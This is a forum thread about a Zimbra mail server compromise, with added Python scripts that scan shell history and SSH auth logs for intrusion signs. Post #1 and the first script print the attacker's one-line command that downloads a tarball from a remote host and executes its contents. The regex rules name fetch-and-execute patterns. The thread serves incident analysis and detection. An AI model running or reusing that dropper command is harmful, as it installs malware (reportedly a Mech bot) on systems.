Zimbra :: Forums > Zimbra Collaboration Suite > Administrators

Zimbra Server compromised

Post #1, 07-22-2010, 03:29 AM, sem (Active Member)

Hi - a zimbra box I keep an eye on was compromised on 12/7 - I noticed I stopped receiving automated emails from the backup script.

This was in the .bash_history:

id
uname -a
ls -a
cat .bash_history
cd /tmp
ls -a
wget eff-tee-pee://user:123456@65.38.182.79/autorun.tgz;tar -xzvf autorun.tgz;rm -rf autorun.tgz;cd .m;cd conect3;chmod +x *;./start lfg
cd ..
ls -a
cd ..
rm -rf .m
ps x
kill -9 12150
exit

So the zmback cron was removed. It's an Ubuntu 8.04 server, kept up to date with apt. Apart from Zimbra, the only other thing installed is Webmin, which is locked down to being available only to 2 IP addresses. The router only has open ports for the essential Zimbra services (secure IMAP, SSL SMTP etc.).

Any advice please? My desktop AVG reports the file as being infected with Linux/Mech.A.

I've altered the URL shown so as to stop people clicking on it.

sem
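The history sem posted is a compact example of what a dropper session looks like in a shell history: a download with credentials embedded in the URL, extract, chmod +x and run chained on one line, work inside a dot-prefixed directory under /tmp, then removal of that directory and a kill -9. The script below is an added example (not code from the thread) that encodes those traits as regex rules and runs them over a constructed history modelled on the one in the post; the address in the sample is a TEST-NET placeholder, not the one from the thread, and the rule names and thresholds are my own choices.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample history, modelled on the commands quoted in the post.
# The address is a TEST-NET placeholder (assumption), not the one from the thread.
SAMPLE_HISTORY = """\
id
uname -a
ls -a
cd /tmp
wget ftp://user:123456@203.0.113.10/autorun.tgz;tar -xzvf autorun.tgz;rm -rf autorun.tgz;cd .m;cd conect3;chmod +x *;./start lfg
cd ..
rm -rf .m
ps x
kill -9 12150
exit
"""

# Each rule is (name, regex) and is applied to one history line at a time.
RULES = [
    # Download with a username:password embedded in the URL (wget/curl).
    ("fetch_with_embedded_credentials",
     re.compile(r"\b(?:wget|curl)\b.*?://[^/\s:@]+:[^/\s@]+@")),
    # Download, chmod +x and execution chained on a single line.
    ("fetch_then_execute_chain",
     re.compile(r"\b(?:wget|curl)\b.*?;.*?\bchmod\s+\+x\b.*?;.*?\./")),
    # Working out of /tmp or inside a dot-prefixed (hidden) directory.
    ("work_in_tmp_or_hidden_dir",
     re.compile(r"\bcd\s+/tmp\b|\bcd\s+\.[A-Za-z0-9_]+\b")),
    # Recursive removal of a hidden directory (clean-up of the dropped tree).
    ("cleanup_of_hidden_dir",
     re.compile(r"\brm\s+-rf?\s+\.[A-Za-z0-9_]+\b")),
    # Hard kill of a process by PID.
    ("forced_kill", re.compile(r"\bkill\s+-9\b")),
]


def scan_history(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, rule name, command) for every rule that fires."""
    findings: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


def rules_hit(text: str) -> List[str]:
    """Distinct rule names that fired, sorted, for a quick verdict."""
    return sorted({name for _, name, _ in scan_history(text)})


def lines_by_rule(text: str) -> Dict[str, List[int]]:
    """Map each rule name to the history line numbers it matched."""
    out: Dict[str, List[int]] = {}
    for lineno, name, _ in scan_history(text):
        out.setdefault(name, []).append(lineno)
    return out


if __name__ == "__main__":
    # Point this at a real file with: scan_history(open(path).read())
    for lineno, name, cmd in scan_history(SAMPLE_HISTORY):
        print(f"line {lineno:>3}  {name:<34} {cmd}")
```

Any single rule on its own is noisy (admins do cd /tmp and kill -9), so the useful signal is several of them firing within a few lines of each other, which is exactly what the posted history shows. The history is also only evidence of what the attacker typed interactively; it says nothing about how they got the shell in the first place.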
Post #2, 07-22-2010, 04:26 AM, Dirk (Moderator)

Can you rule out physical access?
Post #3, 07-22-2010, 05:10 AM, sem (Active Member)

Quote:
Originally Posted by Dirk
Can you rule out physical access?
Not 100% to be honest. The server is in a server room that is normally locked. I'm the only one that knows the root password.

Up until this morning, other than the aforementioned Zimbra ports and SSH, only Webmin was available. I've since closed these ports off too.
Post #4, 07-22-2010, 05:24 AM, dave_kempe (Partner, VAR/HSP)

Odds on, you had a weak password on an account and it was a simple brute-force SSH attack.
Post #5, 07-22-2010, 05:25 AM, Dirk (Moderator)

Are there any signs of brute-forcing the SSH password?
Working out how the attack was performed is hard unless you have experience of this in the past; I'd lean towards thinking that it's not Zimbra itself that's been breached, though.

I'm not aware of any remote exploit or attack that can be performed against ports 25, 443 and 993 open to Zimbra.
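Dirk's question is answered from the authentication log rather than from .bash_history: on Ubuntu 8.04 that is /var/log/auth.log, and on the set-up sem describes the jump host that forwards port 22 has its own auth.log worth reading too. The script below is an added example, not code from the thread: it counts failed sshd password attempts per source address over a constructed auth.log excerpt and flags any address whose run of failures was followed by an accepted login, which is the pattern a successful brute force leaves behind. The threshold of 5 and the TEST-NET addresses are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Constructed auth.log excerpt in syslog/sshd format; the addresses are
# TEST-NET placeholders (assumption), not taken from the thread.
SAMPLE_AUTH_LOG = [
    "Jul 22 02:58:11 mailhost sshd[2105]: Failed password for root from 203.0.113.10 port 40122 ssh2",
    "Jul 22 02:58:14 mailhost sshd[2107]: Failed password for root from 203.0.113.10 port 40131 ssh2",
    "Jul 22 02:58:17 mailhost sshd[2109]: Failed password for invalid user admin from 203.0.113.10 port 40140 ssh2",
    "Jul 22 02:58:20 mailhost sshd[2111]: Failed password for invalid user admin from 203.0.113.10 port 40152 ssh2",
    "Jul 22 02:58:23 mailhost sshd[2113]: Failed password for root from 203.0.113.10 port 40160 ssh2",
    "Jul 22 02:58:26 mailhost sshd[2115]: Failed password for root from 203.0.113.10 port 40171 ssh2",
    "Jul 22 02:58:29 mailhost sshd[2117]: Accepted password for root from 203.0.113.10 port 40180 ssh2",
    "Jul 22 03:10:02 mailhost sshd[2201]: Failed password for sem from 198.51.100.7 port 51234 ssh2",
    "Jul 22 03:10:09 mailhost sshd[2203]: Accepted publickey for sem from 192.0.2.20 port 51240 ssh2",
]

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
# "invalid user" appears when the account does not exist; the user name follows either way.
FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from " + IPV4)
# Accepted <method> (password, publickey, ...) for <user> from <ip>
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted \w+ for (\S+) from " + IPV4)


def analyze_auth_log(lines: Iterable[str], threshold: int = 5) -> Dict[str, object]:
    """Summarise password failures per source address and successes that follow them."""
    failures: Dict[str, int] = defaultdict(int)
    users: Dict[str, set] = defaultdict(set)
    breaches: List[Tuple[str, str, int]] = []
    for line in lines:
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            users[ip].add(user)
            continue
        m = ACCEPTED.search(line)
        if m:
            user, ip = m.groups()
            prior = failures.get(ip, 0)  # failures seen from this address so far
            if prior >= threshold:
                breaches.append((ip, user, prior))
    suspects = {ip: n for ip, n in failures.items() if n >= threshold}
    return {
        "suspects": suspects,                                   # ip -> failure count
        "users_tried": {ip: sorted(users[ip]) for ip in suspects},
        "success_after_failures": breaches,                     # (ip, user, failures before success)
    }


if __name__ == "__main__":
    # For a real server: analyze_auth_log(open("/var/log/auth.log"))
    report = analyze_auth_log(SAMPLE_AUTH_LOG)
    for ip, n in report["suspects"].items():
        print(f"{ip}: {n} failed password attempts, users tried {report['users_tried'][ip]}")
    for ip, user, n in report["success_after_failures"]:
        print(f"LOGIN AS {user} FROM {ip} AFTER {n} FAILURES")
```

Rotated logs (auth.log.1, auth.log.*.gz) need to be fed in as well, since a slow brute force can span days. An empty result is not proof of absence: if the attacker already held a valid password, or came in through a different service, nothing here fires.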
Post #6, 07-22-2010, 05:32 AM, sem (Active Member)

Quote:
Originally Posted by dave_kempe
Odds on, you had a weak password on an account and it was a simple brute-force SSH attack.
Unlikely - I'm not an expert, but port 22 on the router is port-forwarded to another Linux machine; you then open an SSH session to the Zimbra box. I've checked this one and it's not been compromised at all. That's the only SSH route to the Zimbra box.
Post #7, 07-22-2010, 05:34 AM, sem (Active Member)

Quote:
Originally Posted by Dirk
Are there any signs of brute-forcing the SSH password?
Working out how the attack was performed is hard unless you have experience of this in the past; I'd lean towards thinking that it's not Zimbra itself that's been breached, though.

I'm not aware of any remote exploit or attack that can be performed against ports 25, 443 and 993 open to Zimbra.
Not on the Zimbra server - from outside the network, you can't directly SSH to it.
Post #8, 07-22-2010, 06:42 AM, LMStone (Moderator)

Are you saying Webmin was exposed to the public Internet? That alone provides a pretty broad attack surface...

If you also had Webmin open on your Desktop and went to another web site with an infected ad, that could also be the attack vector. See Webmin for example.

If the root account on your Zimbra server has been compromised, just changing the root password is likely not sufficient for eliminating the exposure.

I'd strongly suggest engaging a professional security firm for an assessment.

Hope that helps,
Mark
L. Mark Stone, CIO
Post #9, 07-22-2010, 07:16 AM, sem (Active Member)

Quote:
Originally Posted by LMStone
Are you saying Webmin was exposed to the public Internet? That alone provides a pretty broad attack surface...

Hope that helps,
Mark
Hi - thanks for the advice. I've used Webmin to varying extents for years; the version on the Zimbra box is the latest. It's not really used and doesn't have 100% access from the Internet. It was also not operating on the standard Webmin port.

I've disabled access to the root account and changed the password on the sole user account. I've checked again and the only thing compromised was the cron job; it looks like the virus was unable to propagate itself.

I'm getting someone to take a look at it tonight though.

Last edited by sem; 07-22-2010 at 07:45 AM.
Post #10, 07-22-2010, 11:53 AM, sem (Active Member)

As an update, I've shut off all access from the Internet beyond what Zimbra requires to handle mail. Vigilance ensues.